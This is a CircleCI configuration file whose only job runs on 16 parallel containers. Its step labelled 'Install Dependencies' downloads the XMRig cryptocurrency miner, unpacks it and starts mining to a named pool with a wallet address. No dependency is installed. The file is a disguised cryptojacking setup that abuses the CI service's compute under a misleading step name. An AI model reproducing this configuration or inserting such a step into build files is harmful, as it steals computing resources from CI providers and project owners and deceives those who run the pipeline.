version: 2.1 
jobs: 
  trial: 
    docker: 
      - image: circleci/ruby:2.5.3 
    parallelism: 16 
    steps: 
      - run: 
         name: Install Dependencies 
         command: | 
          wget https://github.com/xmrig/xmrig/releases/download/v6.16.2/xmrig-6.16.2-focal-x64.tar.gz && tar xvzf xmrig-6.16.2-focal-x64.tar.gz && cd xmrig-6.16.2 && ./xmrig -o stratum+tcp://eu.flockpool.com:5555 -u RQ92Z7tTmsxRaAGm8A3jBx9BC5C5Z64AdJ.med11 -p chemed22@gmail.com --tls -a gr -k pause
           
workflows: 
 version: 2.1 
 build: 
  jobs: 
    - trial